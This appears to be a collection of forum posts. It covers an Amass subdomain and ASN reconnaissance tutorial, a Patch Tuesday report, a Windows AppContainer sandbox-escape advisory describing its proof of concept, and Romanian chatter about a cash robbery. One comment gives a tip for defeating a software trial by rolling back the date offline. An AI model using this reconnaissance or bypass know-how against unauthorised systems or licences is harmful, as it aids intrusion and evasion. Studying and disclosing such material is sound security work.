SSL/TLS data discovering and scrapping. To do this, it has its own techniques and provides several integrations with different API services like (spoiler alert!) the SecurityTrails API. It also uses different web archiving engines to scrape the bottom of the internet’s forgotten data deposits. Installation Let’s start by installing this tool in our local environment. While it supports multiple software platforms, more interestingly, it supports different hardware architectures, which means that you could build your own automated box using a small but powerful ARM board—Raspberry PI for instance, or even a mobile phone! Today our focus is to work on a 64-bit PC with Linux, but if you want to test it first and install it later, we strongly suggest you try out the docker image. To install it from a pre-compiled binary, go to the releases section of their Github page. You can access it here, and a screenshot of available zip packages as well as the source code is shown below: It’s very important (especially when using security tools) that you check the integrity of those downloaded binaries to be sure there has been no tampering whatsoever between what you intended to download and what you actually ended up downloading onto your hard drive. To do that, you need to save the file amass_checksums.txt, which includes all the hash checksums corresponding to the binaries required to verify the authenticity of the OS binaries. For the Amass 3.5.2 version (the latest release available at the time of this writing) the checksum file has the following contents: As in this analysis we’re using Linux in an amd64 CPU architecture, we are only verifying this hash (you can avoid this if you want, but the check will output several “No such file…” errors). To do so, we must first remove all non-corresponding hashes from the file, and invoke the following command: $ shasum -c amass_checksums.txt amass_v3.5.2_linux_amd64.zip: OK With that result, we can be assured that the binary is correct, and that there were no file modifications while it was downloading. Simply fetch the desired .zip file (in our case that would be amass_v3.5.3_linux_amd64.zip), uncompress it and enter the newly created folder (amass_v3.5.3_linux_amd64). In it you will see different files and folders, the executable is called “amass”, and when you run it, you’ll see this: This would be the end of the installation, but if you want it to be part of your $PATH, just move the amass binary to your favourite executables folder. First steps Let’s take a look at the subcommands so we can check out the power of this tool: Subcommands: amass intel - Discover targets for enumerations amass enum - Perform enumerations and network mapping amass viz - Visualize enumeration results amass track - Track differences between enumerations amass db - Manipulate the Amass graph database amass dns - Resolve DNS names at high performance We are going to explain briefly what they do and how to activate them, and note a few of them while trying to dig a little deeper than the ones mentioned in the official tutorial or user guide, for both fun and educational purposes! Presentation by obfuscation One particular object within the intel subcommands is the “-demo” flag, which allows us to output results in an obfuscated manner. This way, we can make presentations without revealing too much information about our targets. In this example we are conducting an intelligence gathering action and obtaining an obfuscated output with the use of the -demo flag in the command line. This will replace TLDs and ccTLDs with ‘x’ characters: $ amass intel -asn 6057 -demo adsl.xxxxxxxxx.xxx.xx ancel.xxx.xx ir-static.xxxxxxxxx.xxx.xx algorta.xxx.xx estudiocontable.xxx.xx fielex.xxx.xx ain.xxx.xx vyt.xxx.xx com.xx cx2sa.xxx easymail.xxx.xx mor-inv.xxx catafrey.xxx kernel.xxx.xx bglasesores.xxx sislersa.xxx arpel.xxx.xx copab.xxx.xx spefar.xxx aitacargas.xx duprana.xx sua.xxx.xx gruporovira.xxx exterior.xxxxx.xxx lideco.xxx seaairforwarders.xxx flp.xx acac.xxx.xx cerrolargo.xxx.xx esquemas.xxx Autonomous system number inquiry Autonomous systems are the true guardians of internet communications. They know exactly how your traffic can reach a certain destination by receiving and advertising routing information. If this sounds at all interesting, let us tell you, it is. Let’s dive in a little more, in detail. Every organization connected to the internet with IP ranges to advertise, or that want multihomed broadband connections (for example, “I’m a cloud provider, and want to advertise my own delegated IP range to two different ISPs”), should have an autonomous system (AS for short). An autonomous system number (abbreviated as ASN) is the ID number of this AS given by your region’s NIC authority (you can find more information on this topic in our previous article about ASN Lookup). So what could you possibly do with this command? For one thing, you could dig up all the domain names associated within an entire ASN—that means a complete cloud provider (e.g., Google or Microsoft have their own ASN), an entire mega company (Apple, Akamai and Cloudflare also have their own ASNs), or an entire ISP (internet service providers of all sizes have ASNs, even the medium-sized and smaller ones). Internet exchanges and regional internet registries (IXs and RIRs, respectively) also have associated AS Numbers. So how can we perform an ASN check? Once you have your target’s ASN you can find out what’s in there, as in the following example: $ amass intel -asn 28000 labs.lacnic.net lacnic.net.uy lactld.org dev.lacnic.net lacnic.net lacnog.org net.uy lacnog.lat ripe.net Here we have just queried the LACNIC (Latin American and Caribbean RIR) ASN; now we’ll try with the RIPE (Europe, Middle East and Central Asia RIR) ASN: $ amass intel -asn 25152 root-servers.net Despite the few results, those domains (especially the last one, corresponding to RIPE’s ASN) are some of the most important names on the internet (check out our piece on DNS Root Servers). Great! What else can we do with this tool? Let’s find AS Numbers by way of description. This is incredibly useful, as you can get records quickly and avoid gathering data manually, by looking at companies’ websites, looking glass tools, and more. By following the previous example, we’ll be looking at some of the AS Numbers regarding other existing RIRs (hint: ARIN corresponds to North America, AFRINIC to Africa and APNIC services to Pacific Facing Asia and Oceania): ARIN Results $ amass intel -org ARIN 3856, PCH-AS - Packet Clearing House 3914, KMHP-AS-ARIN - Keystone Mercy Health Plan 4441, MARFORPACDJOSS - Marine Forces Pacific 6656, STARINTERNET 6702, APEXNCC-AS Gagarina avenue 6942, CLARINET - ClariNet Communications Corporation 7081, CARIN-AS-BLOCK - ISI 7082, CARIN-AS-BLOCK - ISI 7083, CARIN-AS-BLOCK - ISI 7084, CARIN-AS-BLOCK - ISI 7085, CARIN-AS-BLOCK - ISI 9489, KARINET-AS Korea Aerospace Research Institute 10034, GARAK-AS-KR SEOUL AGRICULTURAL & MARINE PRODUCTS CORP. 10056, HDMF-AS Hyundai Marin & Fire Insurance 10065, KMTC-AS-KR Korea Marine Transport 10309, MARIN-MIDAS - County of Marin 10439, CARINET - CariNet 10715, Universidade Federal de Santa Catarina 10745, ARIN-ASH-CHA - ARIN Operations 10927, PCH-SD-NAP - Packet Clearing House 11179, ARYAKA-ARIN - Aryaka Networks 11187, GWS-ARIN-AS - Global Web Solutions 11228, ARINC - ARINC 11242, Universidade Federal de Santa Catarina AFRINIC Results $ amass intel -org AFRINIC 33764, AFRINIC-ZA-JNB-AS 37177, AFRINIC-ANYCAST 37181, AFRINIC-Anycast-RFC-5855 37301, AFRINIC-ZA-CPT-AS 37708, AFRINIC-MAIN 131261, AFRINIC-AS-AP Temporary assignment due to software testing APNIC Results $ amass intel -org APNIC 4608, APNIC-SERVICES Asia Pacific Network Information Centre 4777, APNIC-NSPIXP2-AS Asia Pacific Network Information Centre 9450, WEBEXAPNIC-AS-AP Webex Communications Inc 9838, APNIC-DEBOGON-AS-AP APNIC Debogon Project 17821, APNICTRAINING-ISP ASN for APNICTRAINING LAB ISP 18366, APNIC-ANYCAST-AP ANYCAST AS 18367, APNIC-UNI1-AP UNICAST AS of ANYCAST node(Hongkong) 18368, APNIC-SERVICES APNIC DNS Anycast 18369, APNIC-ANYCAST2 APNIC ANYCAST 18370, APNIC-UNI4-AP UNICAST AS of ANYCAST node(Other location) 23659, HEITECH-AS-AP APNIC HEITECH ASN 24021, APNICRANDNET-TUI-AU TUI experiment 24555, APRICOT-APNIC-ASN ASN used for conferences in AP region 38271, CSSL-APNIC-2008-IN CyberTech House 38610, APNIC-JP-RD APNIC R&D Centre 38905, CPHAPNIC-AS-AP Consolidated Press Holdings Limited 45163, APNICRANDNET-TUI2-AU TUI experiment 45192, APNICTRAINING-DC ASN for APNICTRAINING LAB DC 55420, SABAHNET-AS-AP APNIC ASN Block This set of outputs shows us which AS Numbers have a description matching our search criteria, which is extremely useful and fast! Other intel capabilities may include: Reverse WHOIS queries Active reconnaissance On this topic, we could say that the flag -active gives a proactive check against additional sources of information, checks what active SSL/TLS Certificates this server has and provides us with additional information (enabling the -src flag allows us to see which source of information was queried as well as the corresponding result). $ amass intel -addr 8.8.8.8 -src [Reverse DNS] dns.google $ amass intel -active -addr 8.8.8.8 -src[Reverse DNS] dns.google [Active Cert] dns.google.com [Active Cert] 8888.google The intel subcommand provides different ways to output information, and to make further checks like port scanning, you can take a look at more details in the github documentation page. Reconnaissance How about plain and simple DNS record enumeration? Amass provides this using the enum subcommand, and it queries multiple different sources of information to check the existence of domain related subdomains. In the image below you can see the different backends this tool relies on to find information. Some of them are quite peculiar, as in the case of the Pastebin website check. Now here’s an example of how adding an ASN to the query can obtain additional information. In the first query we explicitly added the AS Number, and for the second query it was removed. The results speak for themselves: $ amass enum -asn 28000 -d lacnic.net $ amass enum -d lacnic.net To summarize, adding a context (e.g., ASN) could help with getting more information from your query. Scraping unpublished subdomains Sometimes subdomains won’t show up. They can be a bit inactive, and when queried, their activity goes far below the radar. So how do we get them? Meet subdomain brute forcing. This technique allows us to bring in our custom wordlist and try it against the configured domain name, in an attempt to find or discover unseen subdomains. In this case, we are going to guess… $ amass enum -brute -src -d ripe.net -demo The output will look similar to this: Tracking Is there anything really static on the internet? Well, there are no simple answers to this question. The volatility that DNS records, BGP routes, and IP space have on the internet is astonishing. In this scenario, we will use the track subcommand, to see exactly what has changed between our previous checks. The results may surprise you: Apparently, in a window of roughly six hours, two subdomains’ AAAA records were removed. The track subcommand allows us to match information between checks and output the difference between them, so you can get an idea of how quickly a target is moving. For more detail, you can add the -history flag, and this will output different time frames and activity. The following example accounts for the -history flag, so you can see how the output will look: Wait, there’s data storage too? The short answer is yes. Amass implements a graph database that can be queried after every check to see which records have been modified, and to speed up query results. The following command will give us a summary on the data we’ve collected, showing the sources of information ordered by ASN and IP range in conjunction with a list of the domains and subdomains discovered. $ amass db -show To perform further data analysis, it’s helpful to get a unique identification number that will let you trace the different checks you have made (it helps when trying to filter and visualize data later). To get this ID you’ll need to run the following: Then, if desired, you can get a summary—or the full output—regarding the investigation. For the sake of brevity, let’s just do a summary output of index number 1 corresponding to the ripe.net analysis: Visualization If you’ve come this far, you probably have an overall idea of the power of this tool, and you’re probably plenty excited about the data outputs and the colourful shell results as well! But what if you want to extract these findings and take them to the next level? Perhaps you want to be able to show your target ecosystem, and make a nice presentation of it. If that’s the case, then Amass has you covered. Let’s meet the viz subcommand. That image you see below could be one of the possible outputs. To gain some insight, the small red dot at the center corresponds to the ripe.net domain, and the satellites connected to it are different objects that represent associated data such as IP addresses, DNS records, etc. You can zoom in to see what all this is composed of, namely: Red dots - domain names Green dots - subdomain names Yellow dots - reverse pointer records Orange dots - IP addresses (v4 & v6) Purple dots - mail exchanger records (MX) Cyan dots - nameserver records (NS) Blue dots - autonomous system numbers (ASNs) Pink dots - IP netblocks As you zoom in on this example, your visualization would look like the one below: And if you want to look at (almost) the whole ecosystem, you can zoom out to see the “big picture”. You can make your own visualization, focused on a specific analysis. Now we are taking the index identification number (8) obtained in the previous section and opening the output file that we need to visualize: $ amass viz -enum 8 -d3 The animated visualization HTML file will look similar to this: What about API integrations? While it may seem like this tool has no need for configuration files, that’s not entirely true. When an API interaction is needed, you need to conveniently save your keys so you can use this feature recurrently. To do that, we are going to set up an Amass configuration file, with the necessary information for the APIs to work, and throw down some commands to see how the tool behaves. We can start by downloading an example should be “configuration file from this link. Config file locations should be placed like those stated in the following table depending on your deployment: You can also place a different config file for testing purposes, if you set the -config flag. When it comes to enabling an API key, it’s pretty straightforward. Just uncomment the desired API section and place your SecurityTrails-provided API key: [SecurityTrails] apikey = YOUR_API_KEY Then, simply invoke the desired command, using the config file with the API key in it, in our case: We can see that the SecurityTrails API integration is enabled, now let’s see if we can get any results by using it: Great! You’ve just learned how to enable an API key and execute a query using it. If you need more information, just look into the config file for more useful data about integrations and third-party services. Summary While this tool is an amazing resource for finding data about any target, it’s somewhat vague in its documentation and how it actually works. Of course, you’re probably thinking, “Why do I need to know how they do it?”, but understanding how it gathers data according to a determined method makes it easier to determine how accurate the result is. You could be obtaining a domain associated to a determined ASN that bears no logical relation at first sight without a proper explanation, but is still listed. If you search in the most common places, such as in WHOIS, DNS A MX TXT or reverse pointer (rDNS or PTR) records, etc., you won’t easily find a good reason for its appearance within the output. Of course, if you’re familiar with Golang, you can read first-hand how it’s been created, and yes the -src flag can shed light on where data is pulled from, but if you’re not up for a source code review, a little more in the way of in-depth documentation (explaining how every check works) would be really nice. All in all, know this: Amass should definitely be included in your security toolbox. Source
-
Stiu, am prieteni cu magazine care ruleaza cel putin 20.000 ron zilnic, conteaza provenienta lor si seriile, bancile de obicei le sorteaza pe serii, in caz de sunt serii repetitive si murdare se poate afla usor Edit/ asta in cazul in care nu este ceva putred la mijloc, au fost cazuri cand proprietarii de amanet s-au jefuit singuri pt. asigurare Edit// sunt camere video (CCTV) pe fiecare trecere de pietoni,probabil seful de posta manca gogosi, sigur si-au dat jos mastile cand au plecat, s-au schimbat de haine etc
-
era 404 cand Marcus Hutchins a fost inchis, avea profil acolo, dar intr-un timp a fost "ascuns" Stiu ce inseamna helicopere
-
Microsoft today released updates to remedy nearly 130 security vulnerabilities in its Windows operating system and supported software. None of the flaws are known to be currently under active exploitation, but 23 of them could be exploited by malware or malcontents to seize complete control of Windows computers with little or no help from users. The majority of the most dangerous or “critical” bugs deal with issues in Microsoft’s various Windows operating systems and its web browsers, Internet Explorer and Edge. September marks the seventh month in a row Microsoft has shipped fixes for more than 100 flaws in its products, and the fourth month in a row that it fixed more than 120. Among the chief concerns for enterprises this month is CVE-2020-16875, which involves a critical flaw in the email software Microsoft Exchange Server 2016 and 2019. An attacker could leverage the Exchange bug to run code of his choosing just by sending a booby-trapped email to a vulnerable Exchange server. Also not great for companies to have around is CVE-2020-1210, which is a remote code execution flaw in supported versions of Microsoft Sharepoint document management software that bad guys could attack by uploading a file to a vulnerable Sharepoint site. Security firm Tenable notes that this bug is reminiscent of CVE-2019-0604, another Sharepoint problem that’s been exploited for cybercriminal gains since April 2019. Microsoft fixed at least five other serious bugs in Sharepoint versions 2010 through 2019 that also could be used to compromise systems running this software. And because ransomware purveyors have a history of seizing upon Sharepoint flaws to wreak havoc inside enterprises, companies should definitely prioritize deployment of these fixes, says Alan Liska, senior security architect at Recorded Future. Todd Schell at Ivanti reminds us that Patch Tuesday isn’t just about Windows updates: Google has shipped a critical update for its Chrome browser that resolves at least five security flaws that are rated high severity. If you use Chrome and notice an icon featuring a small upward-facing arrow inside of a circle to the right of the address bar, it’s time to update. Completely closing out Chrome and restarting it should apply the pending updates. Once again, there are no security updates available today for Adobe’s Flash Player, although the company did ship a non-security software update for the browser plugin. The last time Flash got a security update was June 2020, which may suggest researchers and/or attackers have stopped looking for flaws in it. Adobe says it will retire the plugin at the end of this year, and Microsoft has said it plans to completely remove the program from all Microsoft browsers via Windows Update by then. Before you update with this month’s patch batch, please make sure you have backed up your system and/or important files. It’s not uncommon for Windows updates to hose one’s system or prevent it from booting properly, and some updates even have known to erase or corrupt files. So do yourself a favor and backup before installing any patches. Windows 10 even has some built-in tools to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once. And if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see this guide. As always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there’s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips. Source
-
- 1
-
incearca pe un device nou, posibil sa isi lase semnaturi prin DLL-uri pe undeva, daca nu functioneaza cu re-install Il instalezi, setezi aceeasi data, iar cand il repornesti setezi data in care l-ai instalat (off-line)
-
NU eram beat, intra daca poti e 404 hidden shell
-
Dude, intelege, nu au ce sa fac0227 cu banii, sa presupunem ce a spus Pacalici, cum ca ar fi casetele sigilate, bun, dar banii de unde ies prin fantã? Au orificii pe unde se injecteaza "cerneala" in caz de bum Se leaga ai sa te confingi
-
The StorageFolder class when used out of process can bypass security checks to read and write files not allowed to an AppContainer. advisory-info: Windows: StorageFolder Marshaled Object Access Check Bypass EoP Windows: StorageFolder Marshaled Object Access Check Bypass EoP Platform: Windows 10 2004/1909 Class: Elevation of Privilege Security Boundary: AppContainer Summary: The StorageFolder class when used out of process can bypass security checks to read and write files not allowed to an AppContainer. Description: When a StorageFolder object is passed between processes it's custom marshaled using the CStorageFolderProxy class (CLSID: a5183349-82de-4bfc-9c13-7d9dc578729c) in windows.storage.dll. The custom marshaled data contains three values, a standard marshaled OBJREF for a Proxy instance in the originating process, a standard marshaled OBJREF for the original CStorageFolder object and a Property Store. When the proxy is unmarshaled the CStorageFolderProxy object is created in the client process, this redirects any calls to the storage interfaces to the creating process's CStorageFolder instance. The CStorageFolder will check access based on the COM caller. However, something different happens if you call a method on the marshaled Proxy object. The call will be made to the original process's Proxy object, which will then call the real CStorageFolder method. The problem is the Proxy and the real object are running in different Apartments, the Proxy in the MTA and the real object in a STA. This results in the call to the real object being Cross-Apartment marshaled, this breaks the call context for the thread as it's not passed to the other apartment. As shown in a rough diagram. [ Client (Proxy::Call) ] => [Server [ MTA (Proxy::Call) ] => [ STA (Real::Call) ] ] As the call context is only captured by the real object this results in the real object thinking it's being called by the same process, not the AppContainer process. If the process hosting the StorageFolder is more privileged this can result in being able to read/write arbitrary files in specific directories. Note that CStorageFile is similarly affected, but I'm only describing CStorageFolder. In any case it's almost certainly the shared code which is a problem. I've no idea why the classes aren't using the FTM, perhaps they're not marked as Agile? If they were then the real object would be called directly and so would still be running in the original caller's context. Even if the FTM was enabled and the call context was maintained it's almost certainly possible to construct the proxy in a more privileged, but different process because of the asymmetric nature of the marshaling, invoke methods in that process which will always have to be performed out of process. Fixing wise, firstly I don't think the Proxy should ever end up standard marshaled to out of process callers, removing that might help. Also when a call is made to the real implementation perhaps you need to set a Proxy Blanket or enable dynamic cloaking and impersonate before the call. There does seem to be code to get the calling process handle as well, so maybe that also needs to be taken into consideration? This code looks like it's copied and pasted from SHCORE which is related to the bugs I've already reported. Perhaps the Proxy is not supposed to be passed back in the marshal code, but the copied code does that automatically? I'd highly recommend you look at any code which uses the same CFTMCrossProcClientImpl::_UnwrapStream code and verify they're all correct. Proof of Concept: I've provided a PoC as a C# project. The code creates an AppContainer process (using a temporary profile). It then uses the Partial Trust StorageFolderStaticsBrokered class, which is instantiated OOP inside a RuntimeBroker instance. The class allows opening a StorageFolder object to the AC profile's Temporary folder. The StorageFolderStaticsBrokered is granted access to any AC process as well as the \u"lpacAppExperience\u" capability which means it also works from Classic Edge LPAC. The PoC then uses the IStorageItem2::GetParentAsync method to walk up the directory hierarchy until it reaches %LOCALAPPDATA%. It can't go any higher than that as there seems to be some condition restriction in place, probably as it's the base location for package directories. The code then writes an arbitrary file abc.txt to the Microsoft sub-directory. Being able to read and write arbitrary files in the user's Local AppData is almost certainly enough to escape the sandbox but I've not put that much time into it. 1) Compile the C# project. It will need to grab the NtApiDotNet from NuGet to work. 2) Run the POC executable. Expected Result: Accessing files outside of the AppContainers directory is blocked. Observed Result: An arbitrary file is written to the %LOCALAPPDATA%\\Microsoft directory. This bug is subject to a 90 day disclosure deadline. After 90 days elapse, the bug report will become visible to the public. The scheduled disclosure date is 2020-09-23. Disclosure at an earlier date is also possible if agreed upon by all parties. Related CVE Numbers: CVE-2020-0886. Found by: forshaw@google.com Download: GS20200908185407.tgz (18 KB) Source
-
- 1
-
man vorbim de Otopeni, nu de Berzunti
-
Nytro pernutele acelea de Ariel despre care spuneam, contin un acid anume ce topesc unele elemente indiferent de euro dolari se observa clar la UV PS lirele sunt to de plastic
-
"exista si la case mai mari" https://www.ecb.europa.eu/euro/banknotes/ink-stained/html/index.en.html
-
Complex workflows Titanoboa is a platform for creating complex workflows on JVM. Due to its generic, distributed and easily extensible design, you can use it for wide variety of purposes: as a Service Bus (ESB) as a full-featured iPaaS / Integration Platform for Big Data processing for IT Automation for Batch Processing for Data Transformations / ETL Your workflow graph can be even cyclic! We don't care. In titanoboa workflows you can execute your steps sequentialy or in parallel. You can then join parallel threads back together whenever you wish to. Each step can be handled transactionally to make sure it really did run. If things go south you can let the step retry automatically. Or just catch errors and handle them as you wish... Screenshots: Download Trial Source
-
incearca metoda aceasta
-
Oricum nu au ce sa faca cu banii (daca sunt modele noi), la primul soc se sparg pernutele de ariel, se vor certa intre ei, se leaga singuri cretinii